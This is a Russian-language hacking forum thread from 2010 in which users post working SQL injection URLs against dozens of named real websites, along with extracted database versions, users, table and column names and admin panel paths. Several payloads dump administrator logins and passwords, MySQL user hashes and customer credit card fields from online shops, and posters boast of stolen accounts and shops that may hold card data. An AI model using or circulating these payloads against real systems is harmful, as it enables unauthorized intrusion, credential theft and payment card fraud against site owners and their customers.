Просмотр полной версии : SQL Инъекции
Минут пять не мог понять как раскрутить инъекцию xD
http://lidashoes.com/index/news/cor/env/id/eq/-1'+union+select+1,2,3,4,5+--+'
version: 4.0.25-standard
database: lidashoe_lidashoes
user: lidashoe@localhost
http://polly.by/index/catalogue/env/r_id/eq/-1'+union+select+1,2,concat(database(),0x3a,user(), 0x3a,version()),4,5,6+--+'
version: 4.0.25-standard
database: pollyby_polly
user: pollyby@localhost
http://www.vesta.by/index/news/cor/env/id/eq/-1'+union+select+1,2,concat(database(),0x3a,user(), 0x3a,version()),4,5+--+'
version: 4.0.25-standard
database: vestaby_vesta
user: vestaby@localhost
Ну и такие вроде бы все сайты разработанные фирмой proximalogic. Линк на их портофолио: http://www.proximalogic.com/index/portfolio/
"Преимущества работы с нашей организацией
Многолетний опыт стабильной работы.
Профессиональная команда способная решить любые задачи.
Использование самых современных и передовых технологий."
Я в тоске...
P.S. и у них на сайте тоже есть скуля хDDDD
http://www.proximalogic.com/index/news/cor/env/id/eq/-1'+union+select+1,2,3,4,5,6+--+'
database: proxima_proxima
user: proxima@localhost
version: 4.0.25-standard
и скуля напоследок и надо идти спать:
http://www.limex.by/?production&dept_id=-1+union+select+1,2,3,concat(database(),0x3a,user() ,0x3a,version()),5,6,7,8,9,10,11,12,13,14+--+
database: limex_limex
user: limex_limex@localhost
version: 5.0.89-community
http://www.semsk.kz/newscat.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t(database(),0x3a,user(),0x3a,version())+--+
version: 5.0.77
database: semsk_main
user: semsk_main@localhost
http://ymo.su/newscat.php?id_category=-1+union+select+1,2,3,4,5,concat(database(),0x3a,us er(),0x3a,version()),7,8,9,10,11,12,13,14,15,16+--+&id_region=1
version: 5.0.67-log
database: u141802_ia
user: u141802@10.10.223.237
[Feldmarschall]
18.02.2010, 22:01
http://foxridge.web2.ttlc.net/detail.cfm?product=3699+OR+1=@@version+--+
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://foxridge.web2.ttlc.net/detail.cfm?product=3699+OR+1=(select+top+1+table_n ame+from+information_schema.tables+where+(table_na me)+not+in+(select+top+1+table_name+from+informati on_schema.tables))+--+
http://www.brew-monkey.com/news.php?id=757+union+select+1,2,version(),4,5+--+
Database: brew-monkey
User: bmdbuser
Version: 4.0.26-nt
Mr.Br0wn
19.02.2010, 04:01
Забугорный шоп, возможно наличие СС.
http://sales.capitalsoundandlight.com/product.php?id=-7+union+select+UNHEX(HEX(concat_WS(0x3a,Version(), Database(),user()))),2--
Version: 4.1.14
User: CSL
DataBase:csl@localhost 2
-===-
Тут уже всё раскручено.
Версия пятерка.
http://www.bigcheez.com.au/buy_print.php?id=1&item=32+and+1=0+union+select+1,2,unhex(hex(concat_ ws(0x3a,username,password))),4,5,6,7,8,9+from+user--
-===-
Шоп свежий. СС пока что нету.
Версия: 4
https://www.xmission.com/~kensandersrarebooks/inventory_buy.php?id=16946+and+1=0+union+select+1, 2,3,concat_ws(0x3a,bill_firstname,bill_lastname,bi ll_address,bill_city,bill_state,bill_zip,bill_coun try,cc_name,cc_number,cc_expiry,cc_pin),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,4 3+from+customers--
-===-
Version = 4.1.22-standard
Current User = academy_webmaste@localhost
Current Database = academy_efm
PR: 4
http://www.efmacademy.nl/index.php?id=4&subid=56+and+1=0+union+select+1,2,3,4,5,6,7+from+a dmin--
Это была пожалуй самая замедрёная моя инъекция... но интересны же те инъекции, проводя которын ты скуриваешь полпачки, а то и пачку сигарет...
Собственно на одном форуме человек чей ник Like A Boss (thnx ему) запостил скулю, а вернее просто линк и кавычку, т.к. провести её он, как я понял, не смог. Nice to stumble across something like this every once in a while. Any teenager in the UK should know what Connexions is. And it's the Berkshire website which i've found a vulnerability for. It's SQL injection И вот, собственно этот линк:
http://connexions.oberon.titaninternet.co.uk/pages.php?id=1048' Ну я подумал, и решил, что надо глянуть. Ну как обычно начал подбирать кол-во столбцов... И снова редирект. Решил попробывать подобрать с помощью программы dumper. Подобрал. 14. Там же и принтабельную колонку нашло(11. Туда я сразу вписал version() ). Но нажав на mysql info я получил сообщение Unknown trouble. Ну тут я начал выдумывать всякие разные конструкции... Ничего не получалось... редирект. И тут я подумал, а что если везде поставить null. Поставил, убрал and 1=2, но и всё равно ничего не вышло. Поставил снова and 1=2, и решил менять по одному значия null'ов на 1,2,3...
Когда вместо первого null'a я подставил 1, я получил Error 404 Not found. Тут я расстроился, и решил бросить это дело, но тут я обратил внимание на урл. И что я вижу: http://connexions.oberon.titaninternet.co.uk/4.0.20-standard. Вот такая вот скуля)
version: 4.0.20-standard
user: connexionsberks@localhost
database: connexions-berkshire
Mr.Br0wn
19.02.2010, 05:57
PR: 4
Version: 5.0.77
http://www.helplinelaw.com/docs/nplog.php?id=CANV3+and+1=0+union+select+1,2,3,4,5, 6,concat_ws(0x3a,username,password,email),8,9,10,1 1+from+admin--
Админка:
http://helplinelaw.com/adminonline/index.php
-===-
ТиЦ: 20
PR: 4
http://www.eco-tourism.kz/content.php?id=109+and+1=0+union+select+1,2,concat _ws(0x3a,username,password),4+from+tb_users--
-===-
PR: 4
user: anthony_iching@localhost
version: 5.0.67-community
database: anthony_anthony
http://www.ichingoracle.com/show_book.php?ID=23+and+1=0+union+select+1,2,3,4,5 ,6,7,concat_ws(0x3a,user(),version(),database()),9 ,0,1--
http://univd.edu.ua/index.php?lan=ukr&id=-1+union+select+1,unhex%28hex%28concat_ws%280x3a,Lo gin,password,name,category_id,active,email,region, city,phone,id,name,count_open,old_date,url%29%29%2 9,3+from+users--
http://voznesenskaya.com/buy.php?id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),database(),version()),10+--+
voznesensk@localhost:voznesensk:5.0.26-log
http://musakov.ru/inc/ind.php?page=3&exist=1&year=2008&id=-1+union+select+1,2,3,4,concat(database(),0x3a,user (),0x3a,version()),6,7
musakov:musakov@localhost:4.1.20-lk-log
http://board.titaeva.ru/ind.php?id_categ=-1+union+select+1,2,3,4,5,concat(version(),0x3a,use r(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20+--+&tr=1
4.1.25-log:titaeva8_user1@localhost:titaeva8_base1
http://www.bazasuper.ru/dosk/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,u ser(),0x3a,database()),8,9,10,11,12,14,14,15,16,17 ,18,19,20,21,22,23+--+&tr=1
5.0.32-Debian_7etch8-log:u2478@localhost:u2478_bazasuper
http://www.kuchamala.info/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,u ser(),0x3a,database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28+--+&tr=1
5.0.51a-community:forexsta_alex@localhost:forexsta_doska
http://www.cqham.sumy.ua/board5/ind.php?id_categ=-1+union+select+1,2,3,4,5,concat(version(),0x3a,use r(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21+--+&tr=1
5.1.33:cqham@localhost:cqham
Исчо)
http://maximstroy.ru/catalog/ind.php?id=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,u ser(),0x3a,database()),8,9,10,11+--+
5.0.67-log:u72532@10.10.223.239:u72532_2
http://www.electro-sila.ru/board/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,u ser(),0x3a,database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27+--+
5.0.67-log:u29186@10.10.153.190:u29186_2
http://global.usf.edu/educationabroad/progInfo.php?prog_id=-75+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33--
version 4
help us please
http://internetsexshop.ru/information/?id=-1+UNION+SELECT+1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12 ,13+FROM+information_schema.tables--
sqlinjector
19.02.2010, 17:24
Бестолковый сайт
http://www.kkonsult.ru/print_document.php?doc_id=-42+union+select+1,2,3,group_concat%28column_name,0 x3a+separator+0x0b%29,5,6,7+from+information_schem a.columns+where+table_name=0x6B6B5F757365725F70726 F66696C65--
Ы_ы Брест интелектульный)))))) Интелектуалы мля!
http://www.ibrest.net/pnews/pgb.php,ru,?nws_id=-1))+union+select+1,concat(user(),0x3a,database(),0 x3a,version()),3,4,5,6,7,8,9,10,11+--+&nwsrub=1
ibrestn_ibrestdb@localhost:ibrestn_ibrestdatabase: 5.0.32-Debian_7etch6-log
Mr.Br0wn
20.02.2010, 05:05
http://www.surveyquotes.co.uk/view-articles.php?id=7+and+1=0+union+select+1,concat_ws (0x3a,user_login,user_pass),3,4,5,6,7,8+from+wp_us ers--
Strilo4ka
20.02.2010, 05:40
Услуги:
http://www.orangeville.ca/newsletters.php?id=14+union+select+concat_ws(0x3a, version(),database(),@@version_compile_os,user(),p assword)+from+users--+;-)
http://www.congreso.net/services/servicerecorddetail.php?id=29+and+null+union+selec t+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),29--+
http://www.autoonline.com.ua/news/index.php?id=4370+order+by+9--+как blind крутить!
гы дубли, спс Scipio, переменная не попадла в запрос, реакция на '='
http://topok.com.ua/services.php?id=22/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)
erotika-auktionen.de
http://www.erotika-auktionen.de/news.php?id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,database%28%29,user%28%29%29,3,4,5+--
version:5.0.51a-24+lenny2
database:usr_web130_1
user:web130@localhost
www.erotikzentrum24.de
http://www.erotikzentrum24.de/news.php?id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,database%28%29,user%28%29%29,3,4,5+--
version:5.0.51a-24+lenny2
database:usr_web131_1
user:web131@localhost
www.vshoes.ru
http://vshoes.ru/catalog.php?catid=2&index=1&tovzvetint=202&tovartik=-78700'+union+select+concat_ws(0x3a,version(),user( ),database(),@@version_compile_os)--+
Database Version: 4.1.22
Database name: k2_vshoesru
User name: k2_vshoesru@localhost
Strilo4ka
20.02.2010, 23:53
админкО /admin/ в robots.txt
ось win
mg=on
ко-во атрибутов 41
есть форум 300 пользователей зарегеных
pr 3 вроде
http://tennis-ukraine.com/index.php?p=players&id=-218+union+select+1,2,concat_ws(version(),database( ),user(),@@version_compile_os),'4',5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41--+;-)
0x0.Injector
21.02.2010, 00:38
1.museum
american.naturalhistory.museum - PR=4
SQL
http://american.naturalhistory.museum/ology/features/ologist/stiassny/question.php?id=1+and+1=0+union+all+select+1,versi on%28%29,database%28%29,4,5,6,user%28%29,8/*
version - 5.0.41-community-log
user - ology_admin@localhost
database - ology
member
http://american.naturalhistory.museum/ology/features/ologist/stiassny/question.php?id=1+and+1=0+union+all+select+1,conca t_ws%280x3a,ADJ_PART_ID_REF,NOUN_PART_ID_REF,NAME_ SUFFIX,PASSWORD,HINT_WORD_ID_REF,HINTWORD,MEMBER_C REATED,LAST_LOGIN,MEMBER_STATUS%29,PASSWORD,4,5,6, MEMBER_STATUS,8+from+member+limit+0,1/*
2.museum
santelmo.donostia.museum
SQL
http://www.santelmo.donostia.museum/eus/publicacionesdeexposicionesmasinfo.php?op=5&ver=todo&titulo=&autor=&anno=&id=1+and+1=1+union+all+select+1,2,3,version%28%29, database%28%29,user%28%29,7,8,9,10,11,12
version - 5.0.51a-3ubuntu5.5
user - bbdd_museode@localhost
database - santelmo
http://avtoarenda.com.ua/ind.php?option=com_tourist&mid=54&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7+--+
avtoarenda_site@localhost:5.1.41:avtoarenda_site
http://www.obtainsearch.com/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,group_concat(database() ,0x3a,user(),0x3a,version()),8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+--+&tr=1
doskapost:doskapost@68.178.254.145:5.0.67.d7-ourdelta-log
http://www.avtostolica.com.ua/ind.php?id=-1+union+select+1,2,3,concat(user(),0x3a,database() ,0x3a,version()),5,6,7,8,9+--+
news@localhost:news:5.0.51a-24+lenny2-log
http://www.siac.com.sg/details.php?id=56+union+select+1,concat(unhex(hex( user())),0x3a,unhex(hex(database())),0x3a,unhex(he x(version()))),3,4,5,6,7,8,9+--+
root@localhost:siacdb:4.1.10-standard-log
http://www.webnewshub.com/story1.php?nid=(SELECT+*+FROM(SELECT+*+FROM(SELECT +NAME_CONST(version(),14))+as+t+JOIN+(SELECT+NAME_ CONST(version(),14))b)c)
version: 5.0.83-log
Strilo4ka
21.02.2010, 01:56
http://www.makovetskiy.ru/news.php?id=1204+or+(1,2)+in+(select+*+from(Select %20name_const(version(),1),name_const(version(),1) )eba)/*;-)
Duplicate column name '5.0.22'
Перехакал))
1565 аккаунтов!)))
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(version(),0x3a,user( ),0x3a,database()),3+--+&rcid=2
version: 5.0.83-log
user: webnewsadmin@boscgi1303.eigbox.net
database: webnewshub
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(schema_name),3+from+ information_schema.schemata+--+&rcid=2
databases: information_schema,webnewshub
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(table_name),3+from+i nformation_schema.tables+where+table_schema=0x7765 626e657773687562+--+&rcid=2
tables:
adv_detail
adv_master
c_category
c_subcat_master
c_subcategory
category
country
gallery
gallery_category
gallery_images
game
news_comments
news_ip_votes
news_master
news_tags
newsletter
poll_ips
poll_master
poll_options
ref_category
ref_master
rss_category
rss_feed,state
tags
user_info
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x7573 65725f696e666f+--+&rcid=2
user_info columns:
user_id
display_name
user_name
u_email
password
user_type
country
phone_no
reg_date
email_flag
status
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(user_name,0x3a,passw ord,0x3a,u_email),3+from+user_info+where+user_name =0x53616e6479+--+&rcid=2
http://www.eco2000.com.br/capa/ind.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a, database(),0x3a,version()),10,11,12+--+
eco2000@localhost:eco2000_noticias:5.0.89-community-log
Прикольное название)
http://www.computer-and-bees.com/board/ind.php?pn=53&id_categ=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,data base(),0x3a,version()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+--+
pavl2004_pavl@localhost:pavl2004_links:5.0.37
http://sillacinema.com/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,data base(),0x3a,version()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28+--+&tr=1
sillacin_test@localhost:sillacin_test:5.0.89-community
user:id,email,login,pass,name,surname,state,city,r eport
login:id,user,pass,sess,rights,rname,mail,editor
Mr.Br0wn
21.02.2010, 05:45
PR: 7
[+] User: root@localhost
[-] Version: 4.1.22-community-nt
Database: newenfocus
http://www.enfocus.com/flows.php?id=7+and+1=0+union+select+1,2,concat_ws( 0x3a,user(),version(),database()),4,5,6,7,8,9,10,1 1,12,13--
[+] admin panel:
http://www.enfocus.com/admin/
[+] phpMyAdmin:
http://www.enfocus.com/phpMyAdmin/
---===---
PR: 6
[+] Version: 5.0.89-community
User: sciences_cms@localhost
Database: sciences_cms
http://www.sciencescotland.org/feature.php?id=7+and+1=0+union+select+1,2,concat_w s(0x3a,version(),user(),database()),4,5,6,7,8--
---===---
PR: 5
[+] Version: 5.0.45
User: transcoalition@localhost
Database: transcoalition
http://transitioncoalition.org/transition/assessment_review/view.php?id=7+and+1=0+union+select+1,2,concat_ws(0 x3a,username,password),4,5+from+auth_user--
bes.sao.mos.ru
http://bes.sao.mos.ru/news_full.php?id=28333+UNION+SELECT+1,AES_DECRYPT( AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a, User(),0x3a,@@version_compile_os),0x71),0x71),3,4, 5+LIMIT+1,1--
Database Version: 4.1.12
Database name: sao
User name: sao@chicken
OS: redhat-linux-gnu
стыдно конечно но не докрутил скулю (даже не узнал version)
если кто-нибудь докрутит скиньте мне вличку please как.
http://www.limenatural.co.uk/latest.asp?ID=&offset=&prod_id=8896%20union+select%201,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,42--+
Strilo4ka
21.02.2010, 20:50
http://fitnesslife.com.ua/index.php?id=7647&show=4nalbum&do=showgall&gid=13078+union+select+1,2,3,4,@@version,6,7,8,9--+
джокестера заслуга бес скобок крутить то можно ...
http://fitnesslife.com.ua/myadmin/index.php
http://www.infovis.net/printMag.php?num=-141+union+select+1,2,3,4,group_concat(User,0x3a,Pa ssword),6,7,8,9,10,11,12,13+FROM+mysql.user--+&lang=2
привилегий на читалку для текущого пользователя нет, ищем пхпмайдмин :)
http://www.qigong.ru/beginners/index.php?num=-3+union+select+1,concat(version(),0x3a,user(),0x3a ,database(),0x3a,@@version_compile_os),concat(conc at_ws(0x3a,User,Password,file_priv)),4+from+mysql. user+limit+1,1--+&lng=r
юзаем читалку, смотрим пхпинфо http://www.qigong.ru/test1.php
Всё в открытом виде, но походу он дохлый уже давно
http://www.dsthosting.com/billing/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,GROUP_CONCAT(version( ),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15 ,16--
5.0.89-community:dsthosti_coin1:dsthosti_admin@localhost
tables
phpcoin_admins,phpcoin_articles,phpcoin_banned,php coin_categories,phpcoin_clients,phpcoin_clients_co ntacts,phpcoin_components,phpcoin_domains,phpcoin_ faq,phpcoin_faq_qa,phpcoin_helpdesk,phpcoin_helpde sk_msgs,phpcoin_icons,phpcoin_invoices,phpcoin_inv oices_items,phpcoin_invoices_trans,phpcoin_mail_ar chive,phpcoin_mail_contacts,phpcoin_mail_queue,php coin_mail_templates,phpcoin_menu_blocks,phpcoin_me nu_blocks_items,phpcoin_orders,phpcoin_orders_sess ions,phpcoin_pages,phpcoin_parameters,phpcoin_prod ucts,phpcoin_reminders,phpcoin_server_info,phpcoin _sessions,phpcoin_site_info,phpcoin_topics,phpcoin _vendors,phpcoin_vendors_prods,phpcoin_versions,ph pcoin_whois
phpcoin_domains columns
dom_id,dom_cl_id,dom_domain,dom_status,dom_type,do m_registrar,dom_ts_expiration,dom_sa_expiration,do m_si_id,dom_ip,dom_pathdom_path_temp,dom_url_cp,do m_user_name_cp,dom_user_pword_cp,dom_user_name_ftp ,dom_user_pword_ftp,dom_allow_domains,dom_allow_su bdomains,dom_allow_disk_space_mb,dom_allow_traffic _mb,dom_allow_mailboxes,dom_allow_databases,dom_en able_www_prefix,dom_enable_wu_scripting,dom_enable _webmail,dom_enable_frontpage,dom_enable_fromtpage _ssl,dom_enable_ssi,dom_enable_php,dom_enable_cgi, dom_enable_mod_perl,dom_enable_asp,dom_enable_ssl, dom_enable_stats,dom_enable_err_docs,dom_notes
Strilo4ka
23.02.2010, 20:21
mssql
перебирать впадляк но понятно что можно какой то софт взять но сам пробывал ...
http://www.iea.org/index_info.asp?id=854+or+1=(SELECT+TOP+1+COLUMN_NA ME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E='PASSWORD_T'+and+column_name+not+in+('ID'))--
БД:dbo,guest,INFORMATION_SCHEMA,sys,Ian,iea_read er,iea_data,Writer,Reader,db_owner...
Таблица PASSWORD_T:
'A','ACCESS_LEVEL','ADDRESS' ,'AFRICA','AIM' ,'ALUMNI','ANCHOR_NAME' ,'ARCHIVE_START' ,archiveid','ARRIVAL_DATE' ...
имя БД : http://www.iea.org index_info.asp?id=854+or+1=(select+db_name())--+версия:http://www.iea.org/index_info.asp?id=854+or+1=@@version--+
Кстати здесь идеальная ошибка как писал забаненый cash --> Unclosed quotation mark after the character string
http://www.cr.camcom.it/view.php?topic=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13,14,15,16,17+--+
Version: 4.1.19-max
User: cciaa
Database: cciaa
Strilo4ka
24.02.2010, 04:26
http://www.kozactvo.org.ua/uk_u.php?d=a&i=-2165+union+select+1,2,3,4,5,6,7,8,version(),10,11, 12,13,14,15,16--+
http://www.wbdg.org/ccb/browse_doc.php?d=-5445+union+select+concat(version(),file_priv,user) ,2,3,4+from+mysql.user+where+user=0x6273615f666f72 756d--+
5.0.88-rsNbsa_forum
nemaniak
24.02.2010, 12:05
shortcms.de
http://www.shortcms.de/printview.php?func=news1&pvid=-55%20union%20all%20select%201,concat_ws%280x3a,ver sion%28%29,user%28%29,database%28%29%29,3,4,5,6,7, 8--
5.0.81-log:dbo230238322@212.227.29.31:db230238322
firstsong.de
http://www.firstsong.de/kde/printview.php?func=news1&pvid=-55%20union%20select%201,concat_ws%280x3a,version%2 8%29,user%28%29,database%28%29%29,3,4,5,6,7--
5.0.32-Debian_7etch11-log:web9@localhost:usr_web9_1
Какой-то порнографический(или эротический) сайт мля... Пришлось аж картинки отключать, чтобы не видеть этого!!! Blind,запарился перебирать:
http://www.squirtz.com/model.html?id=-1+union+select+1,2,3,4,0,6,ascii(substring((select +version()),1,1)),8--
version: 5.0.7
user: root@localhost
database: networkCentral
Короче смысл какой: первый столбец - id модели. Я взял первый. Там отображается возраст, 31 год для первого id-шника.
7ой столбец - это сколько отнимается от возраста. Ну и надо считать(математика ёпт).
В результате того запроса, который я написал, возраст получается -22->22+31=53(ascii ёпт)->версия 5
http://www.borkecast.ru/index.php?action=pages&sid=4&id=-1+Union+select+1,2,3,4,5,6,7,concat(version(),0x3a ,user(),0xa3,database()),9
5.0.51a-community:
borkecas_borkec0@localhost
borkecas_borke
Ещё раз выложу, если удалите, хоть напишите почему!
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,concat(v ersion(),0x3a,user(),0x3a,database()),5,6,7,8,9,10 ,11,12,13,14,15+--+
5.0.45:root@localhost:viajando_
Databases:
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_co ncat(schema_name),5,6,7,8,9,10,11,12,13,14,15+from +information_schema.schemata+--+
information_schema,mysql,test,viajando_
Tables database(mysql)
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_co ncat(table_name),5,6,7,8,9,10,11,12,13,14,15+from+ information_schema.tables+where+table_schema=0x6d7 973716c+--+
columns_priv,db,func,help_category,help_keyword,he lp_relation,help_topic,host,proc,procs_priv,tables _priv,time_zone,time_zone_leap_second,time_zone_na me,time_zone_transition,time_zone_transition_type, user
Tables database(viajando_)
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_co ncat(table_name),5,6,7,8,9,10,11,12,13,14,15+from+ information_schema.tables+where+table_schema=0x766 9616a616e646f5f+--+
afiliados,ano,areas,atracoes,atracoes_avulsas,atra coes_comentarios,cadastro,cadastro_ano,cadastro_di a,cadastro_mes,chat,cidades,clubes,codigos_seguran ca,colunas,colunas_colaboradores,compras,compras_l ista,compras_lista_categorias,curiosidades,dia,dis ney_legends,dominio,empresas,encontros_gifts,enque te,enquete_opcao,estados,eventos_sazonais,forum_di cas,forum_informacoes,forum_online,forum_topicos,f orum_topicos_favoritos,fotos,fotos_exibicao,guestb ook,hiddenmickeys,horario,hoteis,hoteis_categorias ,hoteis_comentarios,images,ips_bloqueados,links,li nksrelacionados,lojas,materias,mes,noticias,online ,online_total,palavras,paradas,parques,parques_jar dins,passaporte,patrocinio,patrocinio_clicks,patro cinio_ingresso,patrocinio_ingresso_empresas,planej amento,planejamento_secoes,quotes,quotes_meta,refe icoes_personagens,reformas,rentacar_cars,rentacar_ categories,rentacar_companies,rentacar_promotions, rentacar_tables,restaurantes,restaurantes_comentar ios,shoppings,telefones,tours,users,users_notices, videos,visitas,visto
Columns(mysql.user)
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=1+and+1=2+union+select+1,2,3,group_co ncat(column_name),5,6,7,8,9,10,11,12,13,14,15+from +information_schema.columns+where+table_name=0x757 36572+--+
Host,User,Password,Select_priv,Insert_priv,Update_ priv,Delete_priv,Create_priv,Drop_priv,Reload_priv ,Shutdown_priv,Process_priv,File_priv,Grant_priv,R eferences_priv,Index_priv,Alter_priv,Show_db_priv, Super_priv,Create_tmp_table_priv,Lock_tables_priv, Execute_priv,Repl_slave_priv,Repl_client_priv,Crea te_view_priv,Show_view_priv,Create_routine_priv,Al ter_routine_priv,Create_user_priv,ssl_type,ssl_cip her,x509_issuer,x509_subject,max_questions,max_upd ates,max_connections,max_user_connections
http://www.gimnazia70.spb.ru/index.php?id_page=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase()),2,3&db=yes
5.0.77-log:
gimnazia_school@jupiter.usedns.com:
gimnazia_school
немного футбола))))
http://www.eurocups.ru/champs/table.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase()),2,3
Strilo4ka
25.02.2010, 05:13
гы версия 4.1.22-standard-log 5
таблица users 57 колонок, пипец
http://www.eaea.org/index.php?k=4821&%20projekti_id=3378+AND%20(1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57)%20=%20(SEL ECT%20*%20FROM%20users%20UNION%20SELECT%201,2,3%0, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57%20LIMIT%201)/*http://www.eaea.org/index.php?k=4821&%20projekti_id=3378+union+select+1,2,3,4,5,group_c oncat(concat_ws(0x3a,version(),user,password)),7,8 ,9,10,11,12,13,14,15,16+from+users/*
http://pinskdrevmebel.ru/novosti/item/otkrytie_novogo_sajta'+and+1=2)+UNION+SELECT+1,2,3 ,4,concat(database(),0x3a,user(),0x3a,version()),6 ,7,8,9,10,11,12,13+--+
pinskdre_loran: pinskdre@localhost: 5.0.87-community-log
Все пароли снова в открытом виде(
http://www.oferta.ro/anunturi/Imobiliare/Inchirieri-apartamente-4_-camere/Sibiu/Apartament-in-Piata-Mica&siteid=937135+UNION+SELECT+concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),2+LIMIT+ 1,1--
Database Version: 4.1.22-standard
Database name: oferta_oferta
User name: oferta_oferta@localhost
Os : unknown-linux-gnu
http://tobaccoreporter.com/home.php?id=498&art=-1+union+select+1,concat(database(),0x3a,user(),0x3 a,version()),3,4,5,6,7,8,9,10+--+
trmag_db:trmag_user@localhost:4.1.20
Strilo4ka
26.02.2010, 00:40
http://www.usps.org.ua/index.php?mid=22&action=news_full&news_id=-184+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,users.*+from+users--+ чесно скажу впадло в схему лезть хоть и доступ есть
Можно меня поздравить! сотый пост) спс ачату) много чему научился!)
перешёл на мазиллу)
есть phpbb форум(насколько с базы понял)
http://mashiki.dominga.ru/view.php?id=-1+union+select+1,group_concat(database(),0x3a,user (),0x3a,version())+--+&sec=2
dominga:dominga@localhost:5.0.51a-24+lenny1
http://lyrikline.org/index.php?id=162&L=1&show=Poems&author='+union+select+1,2,3,4,5,6,7,concat_ws(0x3a ,database(),version(),user()),9,10,11,12,13,14,15, 16++--+&cHash=834d11c441
lyrikli_update: 5.0.77-log: lyrikli_typo3@static.215.19.46.78.clients.your-server.de
Databases: lyrikli_typo3,lyrikli_update
http://www.dk-spb.ru/homebook.php?part=contact&idsub=77+UNION+SELECT+CONCAT_WS%28CHAR%2832,58,32% 29,user%28%29,database%28%29,version%28%29%29--
В тайтл выводится.
dbu_domknigi_1@192.168.5.56 : db_domknigi_1 : 5.0.77-log
http://www.ounix.ru/index.php?page=article&id=8%20UNION%20SELECT%201,2,3,concat_ws(0x3a,versi on(),database(),user(),@@version_compile_os),5,6%2 0LIMIT%201,1
Database Version: 4.0.27
Database name: ounix
User name: DarkAdmin@localhost
OS : portbld-freebsd6.2
http://www.discovery-club.com.ua/news.php?id=-1999+union+select+1,2,version%28%29,4,5,6,7-- - 4ка
http://dir.spylog.ru/index1.phtml?group=-1+UNION+SELECT+concat_ws(0x3a,user,password,host,f ile_priv)+from+mysql.user+limit+4,1%23
http://www.eprussia.ru/gallery/gallery.cgi?gallery=showal&album=54+and+2=1+union+select+1,2,version(),4,5%23
http://curriculum.rsuh.ru/index.php?option=content&task=category§ionid=3&Itemid=26&id=97+and+2=1+union+select+version()
http://heroes.ogl.ru/?hero_id=33+and+2=1+union+select+1,concat_ws(0x3a, login,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+fro m+team%23
http://www.fashionbank.ru/pdf/generator/pdf.php?id=-18613+union+select+1,2,'3',concat_ws(0x3a,0x3a,una me,upass),5,6,7,8,9,10,11,12+from+users+where+id=1/*
